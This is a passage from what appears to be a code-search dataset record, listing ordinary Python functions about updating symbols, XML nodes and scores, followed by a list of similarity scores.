update(self, xact, path, msg, flags=rwdts.Flag.REPLACE):\n self._log.debug(\"Updating NSR xact = %s, %s:%s regh = %s\", xact, path, msg, self.regh)\n self.regh.update_element(path, msg, flags)\n self._log.debug(\"Updated NSR xact = %s, %s:%s\", xact, path, msg)", "def update_board(self, symbol, modified_squares):\n\t\tfor coord in modified_squares:\n\t\t\tself.board[coord] = symbol", "def change_track_name(node, driver):\n module_node = node.find(\"./attstr[@name='name']\")\n module_node.set(\"val\", driver)", "def render_symbol(self, name, x, y, *layers, **kw):\n if name not in self._symbols:\n ox,oy = x,y\n x,y = self.cancoords(x, y)\n sym = _Symbol(self, name, x, y, *layers, **kw)\n key = sym.sym.k.get(self._key, \"noname\")\n self._symbols[key].append(sym)\n return sym.sym\n else:\n return None", "def _store_event(self, event):\n symbol = event.symbol\n self.symbol[symbol][\"close\"] = event.close_price\n self.symbol[symbol][\"adj_close\"] = event.adj_close_price\n self.symbol[symbol][\"timestamp\"] = event.time", "def xmlWrite(self, xmlWriter, font, value, name, attrs):\n raise NotImplementedError(self)", "def test_symbol(self, data, symbol_first, symbol_second):\n layer = Points(data)\n assert layer.symbol == \"disc\"\n\n layer.symbol = symbol_first\n assert layer.symbol == symbol_first\n\n layer = Points(data, symbol=symbol_first)\n assert layer.symbol == symbol_first\n\n layer.symbol = symbol_second\n assert layer.symbol == symbol_second", "def update(self, xact, path, msg):\n self._log.debug(\"Updating VLR xact = %s, %s:%s\",\n xact, path, msg)\n self.regh.update_element(path, msg)\n self._log.debug(\"Updated VLR xact = %s, %s:%s\",\n xact, path, msg)", "def drawSymbol(x,y,nsymb='circle',ucoords=1):\n if ucoords:\n dislin.rlsymb(symboldict[nsymb],x,y)\n else:\n dislin.symbol(symboldict[nsymb],x,y)", "def update_score(self, node, addToScore):\r\n current_score = 0\r\n score_string = self.parser.getAttribute(node, 'gravityScore')\r\n if score_string:\r\n current_score = int(score_string)\r\n\r\n new_score = current_score + addToScore\r\n self.parser.setAttribute(node, \"gravityScore\", str(new_score))", "def updateVar(self, id, value, type_):\n if id in self.variables:\n symbol = self.variables[id]\n symbol = sym.Symbol(id, value, type_, symbol.row, symbol.column)\n self.variables[id] = symbol\n return True", "def update_score(self, node, addToScore):\n current_score = 0\n score_string = self.parser.getAttribute(node, 'gravityScore')\n if score_string:\n current_score = int(score_string)\n\n new_score = current_score + addToScore\n self.parser.setAttribute(node, \"gravityScore\", str(new_score))", "def set_initial_symb(self, value):\n self.symb_val[0] = value", "def write(self, symFile):\n logging.debug(\"Writing Device \"+self.device.fullName)\n self.isPower = \"N\" #just keep it normal it's mostly actual\n\n if self.isPower == \"Y\":\n token = \"#\"\n else:\n token = \"\"\n\n symFile.write(\"#Generated for \" + self.device.fullName + \" package \" + str(self.device.package) + \"\\n\")\n symFile.write(\"DEF \" + self.name + \" U 0 100 Y Y \" + ( \"%d\" % self.units) \\\n + \" 0 \" + self.isPower + \"\\n\")\n #TODO give actual names to fields in syms\n symFile.write(\"F0 \\\"\" + token + \"U\\\" 0 0 0 H I C CNN\\n\")\n symFile.write(\"F1 \\\"\" + self.name + \"\\\" 0 0 0 H I C CNN \\n\")\n if self.device.package is not None:\n symFile.write(\"$FPLIST\\n\")\n symFile.write(\" \" + self.device.package + \"\\n\")\n symFile.write(\"$ENDFPLIST\\n\")\n symFile.write(\"DRAW\\n\")\n\n for 
symbol in self.symbols:\n symbol.write(symFile)\n\n symFile.write(\"ENDDRAW\\n\")\n symFile.write(\"ENDDEF\\n\")", "def toXML(self):\n return _libsbml.GeneralGlyph_toXML(self)", "def append(self, symbol):\n if symbol != '\"':\n self.value += symbol\n return False\n else:\n return True", "def update(self, stock_record):\n self._records[stock_record.symbol] = stock_record", "def change_pkg_name(self):\n\n sender = self.sender()\n self.change_data()\n self.full_ed_lines[7].setText(sender.text() + '_node')", "def setBitsPerSymbol(self, bits_per_symbol):\n \n self.bits_per_symbol = bits_per_symbol", "def update_simple(parent, name, value):\n element = parent.find('./' + name) \n\n if element is None:\n element = ET.SubElement(parent, name)\n element.text = value\n else:\n element.text = value", "def icon(self, new_icon):\r\n self.set({\"icon\": new_icon})", "def append(self, symbol):\n if symbol in ('.', 'e', 'E'):\n self.cast = float\n elif not (symbol.isdigit() or symbol in NumberToken.SIGN):\n self.value = self.cast(self.value)\n return True\n\n self.value += symbol\n return False", "def WriteXMLNode(self, node):\n # Mine data\n SetAttributeString(node,\"method\",self.processingMethod)\n SetAttributeString(node,\"processingLoss\",self.processingLoss)\n SetAttributeString(node,\"refiningTake\",self.refiningTake)\n \n return node", "async def on_symbol_price_updated(self, price: MetatraderSymbolPrice):\n self._pricesBySymbol[price['symbol']] = price\n positions = list(filter(lambda p: p['symbol'] == price['symbol'], self._positions))\n orders = list(filter(lambda o: o['symbol'] == price['symbol'], self._orders))\n specification = self.specification(price['symbol'])\n if specification:\n for position in positions:\n if 'unrealizedProfit' not in position or 'realizedProfit' not in position:\n position['unrealizedProfit'] = (1 if (position['type'] == 'POSITION_TYPE_BUY') else -1) * \\\n (position['currentPrice'] - position['openPrice']) * \\\n position['currentTickValue'] * position['volume'] / specification['tickSize']\n position['realizedProfit'] = position['profit'] - position['unrealizedProfit']\n new_position_price = price['bid'] if (position['type'] == 'POSITION_TYPE_BUY') else price['ask']\n is_profitable = (1 if (position['type'] == 'POSITION_TYPE_BUY') else -1) * (new_position_price -\n position['openPrice'])\n current_tick_value = price['profitTickValue'] if (is_profitable > 0) else price['lossTickValue']\n unrealized_profit = (1 if (position['type'] == 'POSITION_TYPE_BUY') else -1) * \\\n (new_position_price - position['openPrice']) * current_tick_value * position['volume'] / \\\n specification['tickSize']\n position['unrealizedProfit'] = unrealized_profit\n position['profit'] = position['unrealizedProfit'] + position['realizedProfit']\n position['currentPrice'] = new_position_price\n position['currentTickValue'] = current_tick_value\n for order in orders:\n order['currentPrice'] = price['ask'] if (order['type'] == 'ORDER_TYPE_BUY_LIMIT' or\n order['type'] == 'ORDER_TYPE_BUY_STOP' or\n order['type'] == 'ORDER_TYPE_BUY_STOP_LIMIT') else price['bid']\n if self._accountInformation:\n self._accountInformation['equity'] = self._accountInformation['balance'] + \\\n functools.reduce(lambda a, b: a + b['profit'], self._positions, 0)", "def update_node(self, node):\n return node.update()", "def update_XML(command, address, XML): \n # return value\n new_address = address\n \n # split command into list\n command_list = command.split(' ')\n command_arg = command_list[1][0:-1]\n \n # determine the 
appropriate action to take\n if (command_list[0] == '<DELAY') and command_arg.isdigit():\n # perform a millisecond delay\n ET.SubElement(XML, 'sleep', {'ms': str(command_arg)})\n \n elif (command_list[0] == '<ADDRESS') and (len(command_arg) == 4):\n if command_arg.startswith('0x') and \\\n pySCPI_config.is_hex(command_arg[2:]):\n # this is a satisfatory new address\n new_address = command_arg \n # end if\n \n elif (command_list[0] == '<BITRATE') and command_arg.isdigit():\n # is a good bitrate so change the bitrate\n rate_attributes = {'khz': str(command_arg)}\n ET.SubElement(XML, 'i2c_bitrate', rate_attributes)\n \n # sleep to allow the config to take effect\n ET.SubElement(XML, 'sleep', {'ms': '200'}) \n \n elif (command_list[0] == '<BITRATE'):\n # check command\n if command == '<PULLUPS ON>':\n # turn pullups on\n config_attributes = {'i2c': str(int(pySCPI_aardvark.I2C)),\n 'spi': str(int(pySCPI_aardvark.SPI)),\n 'gpio': str(int(pySCPI_aardvark.GPIO)),\n 'pullups': '1'}\n \n ET.SubElement(XML, 'configure', config_attributes)\n \n # sleep to allow the config to take effect\n ET.SubElement(XML, 'sleep', {'ms': '200'}) \n \n elif command == '<PULLUPS OFF>':\n # turn pullups off\n config_attributes = {'i2c': str(int(pySCPI_aardvark.I2C)),\n 'spi': str(int(pySCPI_aardvark.SPI)),\n 'gpio': str(int(pySCPI_aardvark.GPIO)),\n 'pullups': '0'}\n \n ET.SubElement(XML, 'configure', config_attributes)\n \n # sleep to allow the config to take effect\n ET.SubElement(XML, 'sleep', {'ms': '200'}) \n \n else:\n print '*** Invalid Pullup Command, use either '\\\n '<PULLUPS ON> or <PULLUPS OFF>'\n #end if \n \n else:\n print '*** The configuration command ' + command + 'requested is '\\\n 'not valid, refer to Read Me***'\n # end if \n \n return new_address", "def updatetree(self):\n if self.node:\n self.node.update()\n self.draw()", "def _add_chart_symbol(self, sym: str):\n return \"=\" + json.dumps({\"symbol\": sym})", "def test_modify_fact(self):\n template = self.env.find_template('template-fact')\n fact = template.assert_fact(**{'int': 1,\n 'float': 2.2,\n 'str': '4',\n 'symbol': Symbol('five'),\n 'multifield': (1, 2)})\n\n fact.modify_slots(symbol=Symbol('six'))\n self.assertEqual(fact['symbol'], Symbol('six'))", "def promote_and_split(self, new_low_symbol, new_high_symbol):\n i_new_cardinality = self.cardinality << 1\n new_low_symbol.cardinality = i_new_cardinality\n new_high_symbol.cardinality = i_new_cardinality\n\n new_low_symbol.sax_character = self.sax_character << 1\n new_high_symbol.sax_character = (self.sax_character << 1) + 1", "def patch(cls):\n cls._original_element = xml.dom.minidom.Element\n xml.dom.minidom.Element = KmlElement", "def print_symbol(texfile, name, hnumber, pname, fdoc):\n texfile.write(\n '\\\\newcommand{{\\\\{0}}}{{\\\\{1}@style{{\\\\symbol{{\"{2}}}}}}}\\n'\n .format(name, pname, hnumber)\n )\n fdoc.write(\n '\\\\symboldemo{{{0}}}{{{1}}}{{\\\\{1}}}\\n'\n .format(hnumber, name)\n )", "def extrn(self, name):\n if name in self.symbols:\n raise Redeclaration(name)\n self.symbols[name] = Symbol(name, 'extrn', None)", "def add_symbol(self, symbol: str):\n return self._call_txtrader_api('add_symbol', {'symbol': symbol})", "def toXML(self):\n return _libsbml.ReferenceGlyph_toXML(self)", "def toXML(self):\n return _libsbml.SpeciesReferenceGlyph_toXML(self)", "def symbol(self): \n return self.__symbol", "def toXML(self):\n return _libsbml.SpeciesGlyph_toXML(self)", "def write(self, symFile):\n logging.debug(\"Writing Symbol \"+self.name)\n for polygon in self.polygons:\n 
symFile.write(polygon.symRep())\n for wire in self.wires:\n symFile.write(wire.symRep())\n for text in self.texts:\n symFile.write(text.symRep())\n for pin in self.pins:\n symFile.write(pin.symRep())\n for circle in self.circles:\n symFile.write(circle.symRep())\n for rectangle in self.rectangles:\n symFile.write(rectangle.symRep())", "def write_close_node(self, key: int) -> None:\n self.close_nodes.append(key)", "def add_symbol_empty(self):\n if osarch_is_32_bit():\n self.add_data((\"empty symbol\", 4, (0, 0, 0, 0)))\n elif osarch_is_64_bit():\n self.add_data((\"empty symbol\", 4, (0, 0)))\n self.add_data((\"empty symbol\", PlatformVar(\"addr\"), (0, 0)))\n else:\n raise_unknown_address_size()", "def __setitem__(self, name, value):\n self.gattrs[name] = value", "def set_node_attributes(G, attr_name):\n if attr_name == 'k-index':\n core_number = nx.core_number(G)\n nx.set_node_attributes(G, core_number, name=attr_name)\n else:\n print('Unknown attribute name:', attr_name)", "def update(self, node, key, value):\n item = self._Item(key, value)\n self.update_node(node, item)", "def set_item(self, y_pos, x_pos):\n self.map[y_pos][x_pos] = 'X'", "def update(self, x):\n pass", "def update_mfg_node(self):\n job_node = self.xml.tree.findall(\"Job\")[0]\n mfg_node = job_node.find(\"Manufacturing\")\n mat_node_1 = job_node.findall(\"Material\")[0]\n mat_node_pos = list(job_node).index(mat_node_1)\n mfg_node_position = list(job_node).index(mfg_node)\n\n if mat_node_pos < mfg_node_position:\n job_node.remove(mfg_node)\n job_node.insert(mat_node_pos, mfg_node)", "def setattr(self, node, attr, value):\n node.set(attr, value)", "def replace_symbol(text, replacement_text=\"\"):\n\n return __RE_SYMBOL.sub(replacement_text, text)", "def update_node(self, old_node: 'GraphNode', new_node: 'GraphNode'):\n\n self.operator.update_node(old_node, new_node)", "def saveState(self):\n e = xml.Element(self.type)\n e.attrib['lastUpdate'] = str(clock.now())\n e.attrib['name'] = self.name\n #e.attrib['status'] = ('true' if self.status else 'false')\n return e", "def fl_add_symbol(symbname, pyfn_DrawPtr, scalable):\n #FL_DRAWPTR = cty.CFUNCTYPE(None, xfdata.FL_Coord, xfdata.FL_Coord,\n # xfdata.FL_Coord, FL_Coord, cty.c_int, FL_COLOR)\n _fl_add_symbol = library.cfuncproto(\n library.load_so_libforms(), \"fl_add_symbol\",\\\n cty.c_int, [xfdata.STRING, xfdata.FL_DRAWPTR, cty.c_int],\\\n \"\"\"int fl_add_symbol(const char * name, FL_DRAWPTR drawit,\n int scalable)\"\"\")\n library.check_if_flinitialized()\n s_symbname = library.convert_to_bytestrc(symbname)\n i_scalable = library.convert_to_intc(scalable)\n library.verify_function_type(pyfn_DrawPtr)\n cfn_DrawPtr = xfdata.FL_DRAWPTR(pyfn_DrawPtr)\n library.keep_cfunc_refs(cfn_DrawPtr, pyfn_DrawPtr)\n library.keep_elem_refs(symbname, s_symbname, scalable, i_scalable)\n retval = _fl_add_symbol(s_symbname, cfn_DrawPtr, i_scalable)\n return retval" ]
[ "0.617891", "0.61759514", "0.61127055", "0.5838499", "0.56468177", "0.56205124", "0.5558976", "0.5554636", "0.5539334", "0.5484995", "0.54771584", "0.5455788", "0.54166734", "0.53877443", "0.5364725", "0.53485316", "0.5334409", "0.5323229", "0.53168017", "0.5301254", "0.5126751", "0.51247275", "0.51015574", "0.5095295", "0.5082515", "0.50778973", "0.50778973", "0.5067637", "0.5064078", "0.50617194", "0.5060727", "0.50438625", "0.5030832", "0.5030832", "0.50121754", "0.5004693", "0.50034344", "0.5002075", "0.49981758", "0.4988749", "0.49863988", "0.49773294", "0.49665412", "0.4954692", "0.49483123", "0.49481803", "0.494062", "0.4923755", "0.49154726", "0.4886663", "0.4879149", "0.48684466", "0.48616505", "0.48438454", "0.48332715", "0.4821317", "0.48192638", "0.48183995", "0.4814856", "0.48133808", "0.48079962", "0.47846085", "0.47692698", "0.47626922", "0.4759726", "0.47512788", "0.47485152", "0.47471276", "0.4742544", "0.47311044", "0.47281867", "0.4718501", "0.4713663", "0.47119343", "0.4710982", "0.4693725", "0.46907246", "0.4688607", "0.4671815", "0.46678507", "0.46675488", "0.4661391", "0.46539855", "0.465285", "0.46493897", "0.46446896", "0.46434122", "0.46215636", "0.46196762", "0.46185875", "0.4617334", "0.4614899", "0.461085", "0.4607651", "0.46033838", "0.46005672", "0.4599089", "0.4595244", "0.45951453", "0.4591599" ]
0.65849906
0
Grep on the basepath to find all files that contain an EDM symbol widget.
def build_filelist(basepath):
    log.info("Building list of files containing EDM symbols in %s", basepath)
    symbol_files = []
    for dir_path, _, filenames in os.walk(basepath):
        for filename in filenames:
            filepath = os.path.join(dir_path, filename)
            if filename.endswith(".opi") and utils.grep(filepath, "EDM Symbol"):
                symbol_files.append(filepath)
    return symbol_files
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def searchfiles(pattern='C:\\\\RoboDK\\\\Library\\\\*.rdk'):\n import glob\n return glob.glob(pattern)", "def find_files(config, slot='*'):\n f_pattern = os.path.join(os.path.join(config['path'],config['led_name']), slot+'*' + config['led_name'] + '*'\n + config['current'] + '*' + config['exp_time'] + '*'\n + config['xpos'] + '*' + config['ypos'] + '*')\n print(f_pattern)\n return glob.glob(f_pattern)", "def find_dcds(src):\n\n dcd_paths = []\n\n for root, dirs, files in os.walk(src):\n for filename in files:\n if filename.endswith(\".dcd\"):\n dcd_paths.append(os.path.join(root, filename))\n\n return dcd_paths", "def __searchFiles(self):\n self.ui.showFindFilesDialog(self.textForFind())", "def findFiles(self):\n\n with open('analysis_result/firmwalkerOutput.txt', 'r') as firmwalker:\n for line in firmwalker:\n if line.startswith('##################################### ssh'):\n self.ssh = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### dropbear'):\n self.dropbear = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### busybox'):\n self.busyBox = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### telnet'):\n self.telnet = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### openssl'):\n self.openssl = next(firmwalker).strip('d/').strip('\\n')", "def find(pattern):\n files = config.index.files(path_glob=\"*%s*\" % pattern)\n print_files(files)", "def filesearch(word=\"\"):\n logger.info('Starting filesearch')\n file = []\n for f in glob.glob(\"*\"):\n if word[0] == \".\":\n if f.endswith(word):\n file.append(f)\n\n elif word in f:\n file.append(f)\n #return file\n logger.debug(file)\n return file", "def gen_find(filepat, top):\n for path, dir_list, file_list in os.walk(top):\n for name in fnmatch.filter(file_list, filepat):\n yield os.path.join(path, name)", "def get_available_patterns() -> list:\n path_folder = os.path.join(config.ROOT_PATH, config.FOLDER_PATTERNS)\n return [f.replace(\".cells\", \"\") for f in os.listdir(path_folder) if os.path.isfile(os.path.join(path_folder, f)) and f.endswith(\".cells\")]", "def findhtml(pathused,ticker,typ):\n\n allfiles = [] # initializing the return list\n pathused += \"/\"+ticker.upper()+\"/\"+typ # since SEC_edgar has a standard way to store files as its the Ticker and inside \n # sec-edgar-filings ==> AAPL ==> 10-K \n \n for r,d,f in os.walk(pathused): # os.walk will return all the files inside the directory (with absolute path)\n # r is the absolute path\n # f is list of files in the folders\n \n if 'filing-details.html' in f: # if filing.html (SEC-edgar convention to name html files) is in this folder \n pathfol = r.replace(\"\\\\\",\"/\") # we modify it \n allfiles.append(pathfol+'/filing-details.html') # we append the absolute path\n else:\n continue\n return allfiles #and return it", "def full_find(self, file, version):\n matches = []\n for root, dirnames, filenames in os.walk(self.checkout_path(version)):\n for filename in fnmatch.filter(filenames, file):\n matches.append(os.path.join(root, filename))\n return matches", "def find_files(basedir, regexp):\n regexp = re.compile(regexp)\n return sorted(fn for fn in glob.glob(os.path.join(basedir, '**'),\n recursive=True)\n if regexp.match(fn))", "def find_define_file_uses(self):\n # Executing git grep is substantially faster than using the define_re\n # directly on the contents of the 
file in Python.\n for define_file in self.get_checked_define_files():\n excluded_files = set([define_file])\n excluded_files.update(define_file.get_included_files(recursive=True))\n all_defines = define_file.get_declared_defines()\n args = ['git', 'grep', '-zwIF']\n for define in all_defines:\n args.extend(['-e', define])\n args.extend(['--', '*.cpp', '*.c', '*.cu', '*.h', '*.cuh'])\n define_re = r'\\b(?:' + '|'.join(all_defines)+ r')\\b'\n output = subprocess.check_output(args, cwd=self._source_root).decode()\n for line in output.splitlines():\n (filename, text) = line.split('\\0')\n fileobj = self._files.get(filename)\n if fileobj is not None and fileobj not in excluded_files:\n defines = re.findall(define_re, text)\n fileobj.add_used_defines(define_file, defines)", "def find_package_data(module, path):\n files = []\n exclude = re.compile(\"\\.pyc$|~$\")\n for dirpath, dirnames, filenames in os.walk(os.path.join(module,path)):\n for filename in filenames:\n if not exclude.search(filename):\n files.append(os.path.relpath(os.path.join(dirpath,filename),module))\n return {module:files}", "def find_modules(x):\n return Path(x).rglob('*.py')", "def _FindKeyFiles(self):\r\n \r\n if self.__fCachedFiles is not None:\r\n return self.__fCachedFiles\r\n \r\n app = wingapi.gApplication\r\n proj = app.GetProject()\r\n files = proj.GetAllFiles()\r\n manage_files = []\r\n settings_files = []\r\n for fn in files:\r\n if os.path.basename(fn) == 'manage.py' and not os.path.dirname(fn).endswith('project_template') and os.path.isfile(fn):\r\n manage_files.append(fn)\r\n elif os.path.basename(fn) == 'settings.py' and not os.path.dirname(fn).endswith('project_template') and os.path.isfile(fn):\r\n settings_files.append(fn)\r\n\r\n pairs = []\r\n for manage_file in manage_files:\r\n for settings_file in settings_files:\r\n manage_dir = os.path.dirname(manage_file)\r\n settings_dir = os.path.dirname(settings_file)\r\n if manage_dir == settings_dir:\r\n pairs.append((manage_file, settings_file))\r\n if len(pairs) > 1:\r\n app.SetStatusMessage(\"Warning: Multiple manage.py/settings.py pairs found in project\")\r\n \r\n if len(pairs) > 0:\r\n self.__fCachedFiles = pairs[0]\r\n else:\r\n self.__fCachedFiles = (None, None)\r\n \r\n return self.__fCachedFiles", "def get_drawings(folder):\n # case insensitive in windows system, so \"dwg\" is ok\n return sorted(Path(folder).glob('**/*.dwg'))", "def _findfile(self,path,label):\n files=[];filenames=os.listdir(path)\n for name in filenames:\n if os.path.splitext(name)[0]==str(label):\n files.append(name)\n return files", "def _find_virtual_namespaces(pkg_roots: Dict[str, str]) -> Iterator[str]:\n for pkg in pkg_roots:\n if \".\" not in pkg:\n continue\n parts = pkg.split(\".\")\n for i in range(len(parts) - 1, 0, -1):\n partial_name = \".\".join(parts[:i])\n path = Path(find_package_path(partial_name, pkg_roots, \"\"))\n if not path.exists() or partial_name not in pkg_roots:\n # partial_name not in pkg_roots ==> purposefully/accidentally skipped\n yield partial_name", "def scan(self, base: str, pattern: str):\n for t in glob.iglob(os.path.join(base, pattern), recursive=True):\n self.report(t)", "def __searchOpenFiles(self):\n self.ui.showFindFilesDialog(self.textForFind(), openFiles=True)", "def locate_scripts():\n scripts = []\n bin_dir = os.path.join(os.getcwd(), 'bin')\n if not os.path.isdir(bin_dir):\n return scripts\n for item in os.listdir(bin_dir):\n full_path = os.path.join(bin_dir, item)\n if os.path.isfile(full_path):\n with open(full_path) as f:\n first_line = 
next(f)\n if first_line.startswith('#!'):\n scripts.append(full_path)\n return scripts", "def findMayaFiles(directory):\n\n pass", "def _GetFontFiles(path):\n return [f for f in listdir(path)\n if os.path.splitext(f)[1] in ('.ttf', '.otf')]", "def find_commands(management_dir):\n command_dir = os.path.join(management_dir, 'commands')\n try:\n return [filename[:-3] for filename in os.listdir(command_dir)\n if not filename.startswith('_') and filename.endswith('.py')]\n except OSError:\n return []", "def find_stub_files(name: str) -> List[str]:\n result = []\n for root, dirs, files in os.walk(name):\n for file in files:\n if file.endswith(\".pyi\"):\n if os.path.sep in root:\n sub_root = root.split(os.path.sep, 1)[-1]\n file = os.path.join(sub_root, file)\n result.append(file)\n return result", "def find(self, file, version):\n matches = []\n for root, dirnames, filenames in os.walk(self.full_doc_path(version)):\n for filename in fnmatch.filter(filenames, file):\n matches.append(os.path.join(root, filename))\n return matches", "def __find_eligible_plugins_in_directory(cls, directory_to_search):\n\n plugin_files = [\n x\n for x in os.listdir(directory_to_search)\n if x.endswith(\".py\") and x[0:-3] != \"__init__\"\n ]\n return plugin_files", "def locGlob(): \n #glob = \"From Internal Local Name Space\" # Toggle Comment\n print(glob)\n\n return", "def getAllDSP (self, inDEV):\n result = []\n def filterDSP (list, dirname, names):\n for name in names:\n if name [-4:] == '.dsp':\n fullpath = os.path.join (dirname, name)\n list.append (fullpath)\n os.path.walk (inDEV, filterDSP, result)\n result = filter (self.isValidPattern, result)\n return result", "def find_exposures(dir='*', prefix='*'):\n dir_prefix = '%s/%s' % (dir, prefix)\n\n sci_exposures = set(glob.glob('%s*SCI_RECONSTRUCTED*.fits' % dir_prefix)) \\\n - set(glob.glob('%s*star*.fits' % dir_prefix)) \\\n - set(glob.glob('%s*SKYFIX*.fits' % dir_prefix)) \\\n - set(glob.glob('%s*SKYSPEC*.fits' % dir_prefix)) \\\n - set(glob.glob('%s*MASK*.fits' % dir_prefix)) \\\n - set(glob.glob('%s*COMBINE*.fits' % dir_prefix)) \\\n - set(glob.glob('%s*COLL*.fits' % dir_prefix)) \\\n - set(glob.glob('%s*BADCALIB*.fits' % dir_prefix)) \\\n - set(glob.glob('%s*FLUXFIX*.fits' % dir_prefix))\n\n print(len(sci_exposures), 'science exposures found')\n\n return sci_exposures", "def _filter(self, path):\n return path.endswith('.py')", "def GetFilesForTool(self):\n return ['tools/valgrind/android/vg-chrome-wrapper.sh',\n 'tools/valgrind/memcheck/suppressions.txt',\n 'tools/valgrind/memcheck/suppressions_android.txt']", "def filter_paths(path):\n return [\"{}/{}\".format(path, f) for f in os.listdir(path) if\n f.endswith(FILE_EXTENSION_VM)]", "def search_entries(search):\n _, filenames = default_storage.listdir(\"entries\")\n result = []\n for filename in filenames: \n if filename.endswith(\".md\"):\n nameonly = re.sub(r\"\\.md$\", \"\", filename)\n \n if nameonly.lower() == search.lower():\n #print(\"name only :\", nameonly)\n #print(\"search :\", search)\n return (nameonly)\n elif search.lower() in nameonly.lower():\n result.append(nameonly)\n return(result)", "def find_avail_mof_files(dell_version):\n assert dell_version is not None\n mof_path = os.path.join(MOFParser.MOF_DIR, dell_version)\n entries = []\n for mof_file_name in glob.glob('{}/*.[Mm][Oo][Ff]'.format(mof_path)):\n mof_file_path = os.path.join(mof_path, mof_file_name)\n mof_file_base_name = os.path.basename(mof_file_name)\n entry = MOFParser.MOFFileEntry(base_name=mof_file_base_name, 
path=mof_file_path)\n entries.append(entry)\n _LOGGER.debug(\"Collected this list of available mof files for dell version %s : %s\",\n dell_version, entries)\n return entries", "def _search_files(self, path, path_glob):\n files = glob.glob(\"%s/%s\"% (path, path_glob))\n files_filt = []\n print \"Searching for matching files in %s/:\" % path\n for f in files:\n if re.search(self._info['pattern'], os.path.basename(f)) is not None:\n files_filt.append(f)\n if len(files_filt) == 0:\n print \"None found.\"\n return files_filt", "def _pkg_filter ( self, pkg_filename ):\n return self.pkg_regex.match ( pkg_filename ) is not None", "def search_file(path, regex, ignore_case, include_undefined, printer):\n re_flags = re.IGNORECASE if ignore_case else 0\n object_files = parse_file(path)\n results = []\n for object_file in object_files:\n for symbol in object_file.symbols:\n if not include_undefined and not symbol.is_defined:\n continue\n if re.search(regex, symbol.name, flags=re_flags):\n results.append(SearchResult(SymbolMatch(symbol, regex, ignore_case),\n ObjectFileLocation(object_file)))\n printer.print_results(results)", "def test_known_file_locations(dataset: linux.LinuxSourcesDataset):\n assert (dataset.src_tree_root / \"kernel\" / \"kexec.c\").is_file()\n assert (dataset.src_tree_root / \"kernel\" / \"smpboot.h\").is_file()", "def find(self, path, all=False):\n matches = []\n if path in self.sources:\n for match in self.loader.get_template_sources(path):\n if not all:\n return match\n matches.append(match)\n return matches", "def find_vtfs(path):\n \n vtfs = []\n for item in os.listdir(path):\n itemPath = os.path.join(path, item)\n if os.path.isdir(itemPath):\n vtfs += find_vtfs(itemPath)\n elif item.endswith('.vtf'):\n vtfs.append(itemPath)\n \n return vtfs", "def find_src_files(kem_dir):\n for dirpath, _, filenames in os.walk(kem_dir):\n for fn in filenames:\n if fn.endswith('.c'):\n if dirpath != kem_dir:\n ndir = dirpath[len(kem_dir) + 1:]\n yield os.path.join(ndir, fn)\n else:\n yield fn", "def get_tracignore_patterns(env_parent_dir):\n path = os.path.join(env_parent_dir, '.tracignore')\n try:\n lines = [line.strip() for line in read_file(path).splitlines()]\n except IOError:\n return ['.*']\n return [line for line in lines if line and not line.startswith('#')]", "def find_binaries():\n\n builddir = Path(__file__).parent.parent / \"builddir\"\n\n bins = []\n\n for folder in [\"examples\", \"tests\", \"tools\"]:\n for path in sorted((builddir / folder).rglob(\"*\")):\n if path.stem.startswith(\"xnvme_single\"):\n continue\n if path.stem.startswith(\"xnvme_dev\"):\n continue\n if path.stem.startswith(\"xnvme_enum\"):\n continue\n if path.is_file() and path.stat().st_mode & os.X_OK:\n bins.append(path.name)\n\n return bins", "def find_extra_include(file_name):\r\n extra_includes = []\r\n with open(file_name) as f:\r\n for m in re.finditer(regex.extra_include, f.read()):\r\n extra_includes.append(m.groups(1))\r\n return extra_includes", "def get_skins_and_extensions(base_dir):\n ext_paths = []\n for subdir in ['extensions', 'skins']:\n for name in os.listdir(os.path.join(base_dir, subdir)):\n if os.path.isdir(os.path.join(base_dir, subdir, name)):\n ext_paths.append(os.path.join(subdir, name))\n return ext_paths", "def get_config_files(self):\n self.clear_lists()\n print self.abs_directory\n for file in os.listdir(self.abs_directory):\n print file\n if file.endswith('.json') and \"qemii\" in file:\n self.txt_files.append(file)", "def get_data_files():\n return [\n 
('share/jupyter/nbextensions/{}'.format(PY_PACKAGE), TARGETS),\n ('share/jupyter/lab/extensions', [\n os.path.relpath(f, '.') for f in glob.glob(TAR_PATH)\n ])\n ]", "def _find_special(self):\n charnames = self._get_char_names()\n for eventdir in glob.glob('/sys/class/input/event*'):\n char_name = os.path.split(eventdir)[1]\n if char_name in charnames:\n continue\n name_file = os.path.join(eventdir, 'device', 'name')\n with open(name_file) as name_file:\n device_name = name_file.read().strip()\n if device_name in self.codes['specials']:\n self._parse_device_path(\n self.codes['specials'][device_name],\n os.path.join('/dev/input', char_name))", "def scan_plugin(self):\n pluginpath=_module_path()\n plugins=[]\n for f in os.listdir(pluginpath):\n if os.path.isfile(os.path.join(pluginpath,f)) and os.path.splitext(os.path.join(pluginpath,f))[-1]=='.py' :\n if 'plugin_' in os.path.basename(f):\n logger.debug(\"found plugin : %s\",f)\n plugins.append(f)\n return plugins", "def readfiles(self, dirname , search , notsearch = 'rgvar' , notdir = 'xyvwa'):\n print('We are in the following directory: %s looking for files that contain %s and not %s' %(dirname, search , notsearch))\n dirlist = os.listdir(dirname)\n for filep in dirlist:\n filep = os.path.join(dirname,filep) \n if os.path.islink(filep):\n pass\n elif os.path.isdir(filep):\n m = re.search(notdir , filep)\n if m is None:\n self.readfiles(filep , search, notsearch = notsearch, notdir = notdir )\n elif os.path.isfile(filep) and '.dat' in filep: \n nm = re.search(notsearch, filep)\n m = re.search(search , filep)\n #print m , nm\n if m is not None and nm is None:\n self.plotfiles.append(filep)\n else:\n pass", "def coffeescript_files():\r\n dirs = \" \".join(THEME_COFFEE_PATHS + [Env.REPO_ROOT / coffee_dir for coffee_dir in COFFEE_DIRS])\r\n return cmd('find', dirs, '-type f', '-name \\\"*.coffee\\\"')", "def list_files(self):\n re_css = re.compile(r'\\.css$')\n re_js = re.compile(r'\\.js$')\n re_adminlte2 = re.compile(r'adminlte2')\n file_list = []\n print \"static path is %s\" % self.static_path\n for dirpath, _, files in os.walk(self.static_path):\n if not re_adminlte2.search(dirpath):\n for name in files:\n if re_css.search(name) or re_js.search(name):\n file_list.append(os.path.join(dirpath, name))\n return file_list", "def opendir() -> list:\n fileexr = [nf for nf in 